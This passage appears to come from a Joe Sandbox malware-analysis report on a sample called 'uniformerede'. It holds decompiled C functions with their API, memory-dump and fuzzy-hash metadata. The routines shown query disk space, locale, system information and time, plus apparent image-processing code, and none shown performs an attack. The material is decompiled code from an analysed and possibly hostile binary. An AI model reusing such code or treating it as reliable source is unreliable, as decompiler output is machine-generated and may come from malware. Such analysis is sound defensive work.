                                                                                                                                                                                                                            				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                                                                                                                                                                                            				_v28 = _v8 * _v12;
                                                                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                                                                            				_t48 = _v24;
                                                                                                                                                                                                                            				_t31 = E004059A0(_v28, _t48, _v16, 0);
                                                                                                                                                                                                                            				_t39 = _a8;
                                                                                                                                                                                                                            				 *_t39 = _t31;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t39 + 4)) = _t48;
                                                                                                                                                                                                                            				_t50 = _v24;
                                                                                                                                                                                                                            				_t34 = E004059A0(_v28, _t50, _v20, 0);
                                                                                                                                                                                                                            				_t40 = _a12;
                                                                                                                                                                                                                            				 *_t40 = _t34;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t40 + 4)) = _t50;
                                                                                                                                                                                                                            				return _t26;
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00409EF5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1705453755-0
                                                                                                                                                                                                                            • Opcode ID: 5fe8685ae6ca18acf303da7102a4e2fa751929eb57f658ac51a7ebe399a7ad83
                                                                                                                                                                                                                            • Instruction ID: 3d4088487c7580c6eb6b6515069bf83f7524b5429ff7be7e0fdab11b3544063a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fe8685ae6ca18acf303da7102a4e2fa751929eb57f658ac51a7ebe399a7ad83
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C1112B5E00209AFDB00CF99C881DAFF7F9FFC8314B54C56AA404E7250E6319E018BA0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E0042F60C(intOrPtr __eax, intOrPtr* __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t22 =  *__edx;
                                                                                                                                                                                                                            				_t26 = _t22 - 0x113;
                                                                                                                                                                                                                            				if(_t22 != 0x113) {
                                                                                                                                                                                                                            					_push( *((intOrPtr*)(__edx + 8)));
                                                                                                                                                                                                                            					_push( *((intOrPtr*)(__edx + 4)));
                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                            					_t12 =  *((intOrPtr*)(_v8 + 0x34));
                                                                                                                                                                                                                            					_push(_t12);
                                                                                                                                                                                                                            					L00407540();
                                                                                                                                                                                                                            					 *((intOrPtr*)(__edx + 0xc)) = _t12;
                                                                                                                                                                                                                            					return _t12;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(0x42f646);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t25;
                                                                                                                                                                                                                            				E00403DE8(_v8, _t26);
                                                                                                                                                                                                                            				_pop(_t21);
                                                                                                                                                                                                                            				 *[fs:eax] = _t21;
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F671
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4255912815-0
                                                                                                                                                                                                                            • Opcode ID: fa02342401d94616f2e5bd42f4260c71efb65923d14809067b41eadbea591770
                                                                                                                                                                                                                            • Instruction ID: 80422fc4f260eb885d3d5276ce9bf4904eb24ae74d3e19530ef2a12f5b611188
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa02342401d94616f2e5bd42f4260c71efb65923d14809067b41eadbea591770
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EF0F676B04214AFD700DF9AE881C96BBFCEB0D7203A140B7F908D7650D235AD009B74
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E00406AC6(int __eax, void* __ebx, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v15;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_push(_t32);
                                                                                                                                                                                                                            				_push(0x406b2e);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t32 + 0xfffffff0;
                                                                                                                                                                                                                            				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                                                                                                                                                                                            				E00404C30( &_v20, 7,  &_v15);
                                                                                                                                                                                                                            				E004035F0(_v20,  &_v8);
                                                                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t29);
                                                                                                                                                                                                                            				 *[fs:eax] = _t29;
                                                                                                                                                                                                                            				_push(E00406B35);
                                                                                                                                                                                                                            				return E004049C0( &_v20);
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: e46581e8cdc3331be5097877ba1128faf35b36a3c95c951874e5d987cba23955
                                                                                                                                                                                                                            • Instruction ID: 1884f1ac99702eb7bfb6ab039d2c511877b7776afc39d63850cc4166923a2af7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e46581e8cdc3331be5097877ba1128faf35b36a3c95c951874e5d987cba23955
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99F02870A04319AFE714DFA2CC42AAEB3BAF7C4310F40857AB510F31C4E7B82A10C684
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00426548(intOrPtr __eax, intOrPtr __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				struct _SYSTEM_INFO* _t17;
                                                                                                                                                                                                                            				unsigned int _t20;
                                                                                                                                                                                                                            				unsigned int _t22;
                                                                                                                                                                                                                            				signed int _t31;
                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t17 =  &_v48;
                                                                                                                                                                                                                            				GetSystemInfo(_t17);
                                                                                                                                                                                                                            				_t33 = _v8;
                                                                                                                                                                                                                            				_t31 = _v12 - 1;
                                                                                                                                                                                                                            				if(_t31 >= 0) {
                                                                                                                                                                                                                            					if( *((short*)( &_v48 + 0x20)) == 3) {
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
                                                                                                                                                                                                                            							 *(_t33 + _t31 * 4) = _t20;
                                                                                                                                                                                                                            							_t31 = _t31 - 1;
                                                                                                                                                                                                                            						} while (_t31 >= 0);
                                                                                                                                                                                                                            						return _t20;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                            						asm("bswap eax");
                                                                                                                                                                                                                            						_t22 =  *(_t33 + _t31 * 4) >> 8;
                                                                                                                                                                                                                            						 *(_t33 + _t31 * 4) = _t22;
                                                                                                                                                                                                                            						_t31 = _t31 - 1;
                                                                                                                                                                                                                            					} while (_t31 >= 0);
                                                                                                                                                                                                                            					return _t22;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t17;
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 00426558
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                                                                                                            • Opcode ID: 5b59df6a4db17697c4621f1198143272915962c4c42650c0f147f9fc6234deed
                                                                                                                                                                                                                            • Instruction ID: 24291676ee62f313b8705277a049495d892b78a3fb7c7c66d6bc96e5edecc5e6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b59df6a4db17697c4621f1198143272915962c4c42650c0f147f9fc6234deed
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDF096B1E01119AFCB11DF98E48489DB7B4FB5A301B95429AD408DB342EB34A6D5C7C9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E00406AC8(int __eax, void* __ebx, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v15;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_push(_t32);
                                                                                                                                                                                                                            				_push(0x406b2e);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t32 + 0xfffffff0;
                                                                                                                                                                                                                            				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                                                                                                                                                                                            				E00404C30( &_v20, 7,  &_v15);
                                                                                                                                                                                                                            				E004035F0(_v20,  &_v8);
                                                                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t29);
                                                                                                                                                                                                                            				 *[fs:eax] = _t29;
                                                                                                                                                                                                                            				_push(E00406B35);
                                                                                                                                                                                                                            				return E004049C0( &_v20);
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: 75c1d52228b281e4a2a8cbe05b9b26f6635f1fb66f4f138c8f1ad605eb8c8863
                                                                                                                                                                                                                            • Instruction ID: 8c46e58028a20f45c726cdf232f197f4d268d7d6409a4c5068237e5da40a84cb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75c1d52228b281e4a2a8cbe05b9b26f6635f1fb66f4f138c8f1ad605eb8c8863
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80F0C871A04319AFE714DFA2CC42A9EB37AF7C4714F51857AA510B71D4E7B82610C684
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040C964(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                                                                                                                                                                                            				char _v260;
                                                                                                                                                                                                                            				intOrPtr _t10;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t18 = __ecx;
                                                                                                                                                                                                                            				_t10 = _a4;
                                                                                                                                                                                                                            				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
                                                                                                                                                                                                                            					return E00404A14(_t10, _t18);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return E00404AB0(_t10, _t5 - 1,  &_v260);
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: 026571d56001ee72b0406f5d7f97dc349247158a98ed82025b723c8338f8d56e
                                                                                                                                                                                                                            • Instruction ID: c55d8128e0464d7f0ffda61b66ea8af477aea0d032980e5ba508f3227b3018b3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 026571d56001ee72b0406f5d7f97dc349247158a98ed82025b723c8338f8d56e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07E092B271421457D314A6695C869EA725C9798310F00427FBA49E73C2EDB89D4446ED
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0040C9B0(int __eax, char __ecx, int __edx) {
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _t5;
                                                                                                                                                                                                                            				char _t6;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                            				_t6 = __ecx;
                                                                                                                                                                                                                            				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                                                                                                                                                                                                            					_t5 = _t6;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t5 = _v16;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t5;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040E39A,00000000,0040E5B3,?,?,00000000,00000000), ref: 0040C9C3
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: 5d8534821ffc97822e41bd311946462fda5bd873699444b04a03bff573cbe2e9
                                                                                                                                                                                                                            • Instruction ID: 274c397104c08bcef1503af243249226e7c8b6f68a7688c9cfeef2f5654669c9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d8534821ffc97822e41bd311946462fda5bd873699444b04a03bff573cbe2e9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98D05EA630E2546AE214525A2D85DBB5AACCAC57B1F10423FF988E7281D2248C0693BA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0040B2D4(long long __fp0) {
                                                                                                                                                                                                                            				struct _SYSTEMTIME _v16;
                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                            				long long* _t10;
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				long long _t12;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t12 = __fp0;
                                                                                                                                                                                                                            				GetLocalTime( &_v16);
                                                                                                                                                                                                                            				_t7 = E0040B110(_v16.wYear, _v16.wDay, _v16.wMonth, _t11, __fp0);
                                                                                                                                                                                                                            				 *_t10 = _t12;
                                                                                                                                                                                                                            				asm("wait");
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 481472006-0
                                                                                                                                                                                                                            • Opcode ID: 5d4b386aad8b6fd01d40aa064b90e864029cd9eaca585b2295d799d1887da282
                                                                                                                                                                                                                            • Instruction ID: a3b185b344278dcf1c9439e42592f718bf33603f87ac91d23c0fcb87781d4dc0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d4b386aad8b6fd01d40aa064b90e864029cd9eaca585b2295d799d1887da282
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71D09E28409505A1C2007B15C85549FB7A4EE84740F808D5DF4D856391EB358595C79B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 16%
                                                                                                                                                                                                                            			E0046C7CC(intOrPtr* __eax, signed int __edx) {
                                                                                                                                                                                                                            				intOrPtr _t135;
                                                                                                                                                                                                                            				intOrPtr* _t138;
                                                                                                                                                                                                                            				signed int _t147;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t138 = __eax;
                                                                                                                                                                                                                            				_t147 = __edx;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(__eax + 0x14)) != 0x64) {
                                                                                                                                                                                                                            					_t135 =  *__eax;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t135 + 0x14)) = 0x14;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t135 + 0x18)) =  *((intOrPtr*)(__eax + 0x14));
                                                                                                                                                                                                                            					 *((intOrPtr*)( *__eax))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *(_t138 + 0x3c) = _t147;
                                                                                                                                                                                                                            				 *(_t138 + 0xcc) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t138 + 0xd8)) = 0;
                                                                                                                                                                                                                            				if(_t147 > 5) {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t138 + 0x14)) = 0xa;
                                                                                                                                                                                                                            					return  *((intOrPtr*)( *_t138))();
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					switch( *((intOrPtr*)(_t147 * 4 +  &M0046C810))) {
                                                                                                                                                                                                                            						case 0:
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x24);
                                                                                                                                                                                                                            							 *(__ebx + 0x38) =  *(__ebx + 0x24);
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x38);
                                                                                                                                                                                                                            							if(__eax < 1 || __eax > 0xa) {
                                                                                                                                                                                                                            								__eax =  *__ebx;
                                                                                                                                                                                                                            								 *(__eax + 0x14) = 0x1a;
                                                                                                                                                                                                                            								__edx =  *(__ebx + 0x38);
                                                                                                                                                                                                                            								 *(__eax + 0x18) =  *(__ebx + 0x38);
                                                                                                                                                                                                                            								 *((intOrPtr*)(__eax + 0x1c)) = 0xa;
                                                                                                                                                                                                                            								__eax = __ebx;
                                                                                                                                                                                                                            								__edx =  *__ebx;
                                                                                                                                                                                                                            								__eax =  *( *__ebx)();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							while(__edx <  *(__ebx + 0x38)) {
                                                                                                                                                                                                                            								__edx + __edx * 4 = __edx + (__edx + __edx * 4) * 4;
                                                                                                                                                                                                                            								__eax = __edx + (__edx + __edx * 4) * 4 << 2;
                                                                                                                                                                                                                            								__eax = (__edx + (__edx + __edx * 4) * 4 << 2) +  *(__ebx + 0x40);
                                                                                                                                                                                                                            								 *__eax = __edx;
                                                                                                                                                                                                                            								 *(__eax + 8) = 1;
                                                                                                                                                                                                                            								 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            								 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            								 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            								 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            								__edx = __edx + 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							return __eax;
                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                            						case 1:
                                                                                                                                                                                                                            							 *(_t138 + 0xcc) = 1;
                                                                                                                                                                                                                            							 *(_t138 + 0x38) = 1;
                                                                                                                                                                                                                            							_t134 =  *(_t138 + 0x40);
                                                                                                                                                                                                                            							 *_t134 = 1;
                                                                                                                                                                                                                            							_t134[2] = 1;
                                                                                                                                                                                                                            							_t134[3] = 1;
                                                                                                                                                                                                                            							_t134[4] = 0;
                                                                                                                                                                                                                            							_t134[5] = 0;
                                                                                                                                                                                                                            							_t134[6] = 0;
                                                                                                                                                                                                                            							return _t134;
                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                            						case 2:
                                                                                                                                                                                                                            							 *(__ebx + 0xd8) = 1;
                                                                                                                                                                                                                            							 *(__ebx + 0x38) = 3;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *__eax = 0x52;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40) + 0x54;
                                                                                                                                                                                                                            							 *__eax = 0x47;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40) + 0xa8;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *__eax = 0x42;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            							return __eax;
                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                            						case 3:
                                                                                                                                                                                                                            							 *(__ebx + 0xcc) = 1;
                                                                                                                                                                                                                            							 *(__ebx + 0x38) = 3;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *__eax = 1;
                                                                                                                                                                                                                            							 *(__eax + 8) = 2;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 2;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40) + 0x54;
